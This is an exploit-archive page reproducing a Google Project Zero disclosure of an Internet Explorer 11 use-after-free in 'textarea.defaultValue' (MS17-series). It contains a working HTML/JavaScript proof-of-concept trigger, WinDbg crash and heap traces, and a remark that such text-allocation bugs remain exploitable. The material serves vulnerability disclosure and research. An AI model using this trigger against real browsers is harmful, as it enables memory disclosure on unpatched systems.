首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Microsoft Internet Explorer - 'textarea.defaultValue' Memory Disclosure (MS17-00 来源：Google Security Research 作者：Google 发布时间：2017-03-21   <!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1076   There is an use-after-free bug in IE which can lead to info leak / memory disclosure.   The bug was confirmed on Internet Explorer version 11.0.9600.18537 (update version 11.0.38)   PoC: ========================================= -->   <!-- saved from url=(0014)about:internet --> <script>   function run() {   var textarea = document.getElementById("textarea");   var frame = document.createElement("iframe");     textarea.appendChild(frame);     frame.contentDocument.onreadystatechange = eventhandler;     form.reset(); }   function eventhandler() {   document.getElementById("textarea").defaultValue = "foo";   alert("Text value freed, can be reallocated here"); }   </script> <body onload=run()> <form id="form"> <textarea id="textarea" cols="80">aaaaaaaaaaaaaaaaaaaaaaaa</textarea>   <!-- =========================================   Please also see the attached screenshots that demonstrate using the PoC for memory disclosure.   The root cause of a bug is actually a use-after-free on the textarea text value, which can be seen if a PoC is run with Page Heap enabled. In that case IE crashes at   (b5c.f44): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=10abbff8 ebx=00000002 ecx=10abbff8 edx=10abbff8 esi=0e024ffc edi=00000000 eip=7582c006 esp=0a3aac48 ebp=0a3aac54 iopl=0         nv up ei pl nz na pe nc cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206 msvcrt!wcscpy_s+0x46: 7582c006 0fb706          movzx   eax,word ptr [esi]       ds:002b:0e024ffc=???? 0:008> k  # ChildEBP RetAddr  00 0a3aac54 7198e8f0 msvcrt!wcscpy_s+0x46 01 0a3aad48 7189508e MSHTML!CElement::InjectInternal+0x6fa 02 0a3aad88 7189500c MSHTML!CRichtext::SetValueHelperInternal+0x79 03 0a3aada0 71894cf9 MSHTML!CRichtext::DoReset+0x3f 04 0a3aae24 71894b73 MSHTML!CFormElement::DoReset+0x157 05 0a3aae40 706c05da MSHTML!CFastDOM::CHTMLFormElement::Trampoline_reset+0x33 06 0a3aaeb0 706b6d73 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x19d 07 0a3aaef8 706baa24 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91 08 0a3ab19c 7071451a jscript9!Js::InterpreterStackFrame::Process+0x3a10 09 0a3ab1d4 70714579 jscript9!Js::InterpreterStackFrame::OP_TryCatch+0x49 0a 0a3ab478 706bdbe9 jscript9!Js::InterpreterStackFrame::Process+0x49a8 0b 0a3ab5b4 09780fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200 WARNING: Frame IP not in any known module. Following frames may be wrong. 0c 0a3ab5c0 706bda16 0x9780fd9 0d 0a3ab868 706bdbe9 jscript9!Js::InterpreterStackFrame::Process+0x1e62 0e 0a3ab984 09780fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200 0f 0a3ab990 706b6d73 0x9780fe1 10 0a3ab9dc 706b73a8 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91 11 0a3aba50 706b72dd jscript9!Js::JavascriptFunction::CallRootFunction+0xb5 12 0a3aba98 706b7270 jscript9!ScriptSite::CallRootFunction+0x42 13 0a3abae4 7086d8f8 jscript9!ScriptSite::Execute+0xd2 14 0a3abb48 7165a587 jscript9!ScriptEngineBase::Execute+0xc7 15 0a3abc04 7165a421 MSHTML!CListenerDispatch::InvokeVar+0x15a 16 0a3abc30 7165a11c MSHTML!CListenerDispatch::Invoke+0x6d 17 0a3abcd0 7165a286 MSHTML!CEventMgr::_InvokeListeners+0x210 18 0a3abce8 7165a1ad MSHTML!CEventMgr::_InvokeListenersOnWindow+0x42 19 0a3abd78 71659f1b MSHTML!CEventMgr::_InvokeListeners+0x150 1a 0a3abedc 714df1d7 MSHTML!CEventMgr::Dispatch+0x4d5 1b 0a3abf08 71969808 MSHTML!CEventMgr::DispatchEvent+0x90 1c 0a3abf40 7132de1f MSHTML!COmWindowProxy::Fire_onload+0x146 1d 0a3abfa0 7132df9c MSHTML!CMarkup::OnLoadStatusDone+0x5c0 1e 0a3abfbc 7132cd31 MSHTML!CMarkup::OnLoadStatus+0xed 1f 0a3ac400 714e8062 MSHTML!CProgSink::DoUpdate+0x48d 20 0a3ac40c 712de2f9 MSHTML!CProgSink::OnMethodCall+0x12 21 0a3ac45c 712ddcfa MSHTML!GlobalWndOnMethodCall+0x16c 22 0a3ac4b0 759962fa MSHTML!GlobalWndProc+0x103 23 0a3ac4dc 75996d3a user32!InternalCallWinProc+0x23 24 0a3ac554 759977c4 user32!UserCallWinProcCheckWow+0x109 25 0a3ac5b4 7599788a user32!DispatchMessageWorker+0x3b5 26 0a3ac5c4 726da99c user32!DispatchMessageW+0xf 27 0a3af794 7277ec38 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464 28 0a3af854 765182ec IEFRAME!LCIETab_ThreadProc+0x3e7 29 0a3af86c 73f73a31 iertutil!CMemBlockRegistrar::_LoadProcs+0x67 2a 0a3af8a4 75e0336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94 2b 0a3af8b0 77b19902 kernel32!BaseThreadInitThunk+0xe 2c 0a3af8f0 77b198d5 ntdll!__RtlUserThreadStart+0x70 2d 0a3af908 00000000 ntdll!_RtlUserThreadStart+0x1b   where the old value was deleated at   0:008> !heap -p -a 0e024ffc     address 0e024ffc found in     _DPH_HEAP_ROOT @ f1000     in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)                                     dd03820:          e024000             2000     7417947d verifier!AVrfDebugPageHeapReAllocate+0x0000036d     77bb126b ntdll!RtlDebugReAllocateHeap+0x00000033     77b6de86 ntdll!RtlReAllocateHeap+0x00000054     71ba761f MSHTML!CTravelLog::_AddEntryInternal+0x00000215     71b8f48d MSHTML!MemoryProtection::HeapReAlloc<0>+0x00000026     71b8f446 MSHTML!_HeapRealloc<0>+0x00000011     7162deea MSHTML!BASICPROPPARAMS::SetStringProperty+0x00000546     71678877 MSHTML!CBase::put_StringHelper+0x0000004d     71fc6d60 MSHTML!CFastDOM::CHTMLTextAreaElement::Trampoline_Set_defaultValue+0x00000070     706c05da jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x0000019d     706c0f77 jscript9!Js::JavascriptOperators::CallSetter+0x00000138     706c0eb4 jscript9!Js::JavascriptOperators::CallSetter+0x00000076     70710cd3 jscript9!Js::JavascriptOperators::SetProperty_Internal<0>+0x00000341     70710b26 jscript9!Js::JavascriptOperators::OP_SetProperty+0x00000040     70710ba6 jscript9!Js::JavascriptOperators::PatchPutValueNoFastPath+0x0000004d     706ba60e jscript9!Js::InterpreterStackFrame::Process+0x00002c1e     706bdbe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x00000200   Note: because the text allocations aren't protected by MemGC and happen on the process heap, use-after-free bugs dealing with text allocations are still exploitable.   Screenshots: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41661.zip -->   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Mozilla Firefox - 'table' Use- ·D-Link DGS-1510 - Multiple Vul ·ExtraPuTTY 0.29-RC2 - Denial o ·dnaLIMS Admin Module Command E ·FTPShell Server 6.56 - 'Change ·Disk Sorter Enterprise 9.5.12 ·FTPShell Client 6.53 - 'Sessio ·SpyCamLizard 1.230 - Denial of ·Microsoft Edge 38.14393.0.0 - ·SysGauge 1.5.18 - SMTP Validat ·Wordpress Plugin Membership Si ·OpenSSH On Cygwin SFTP Client   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved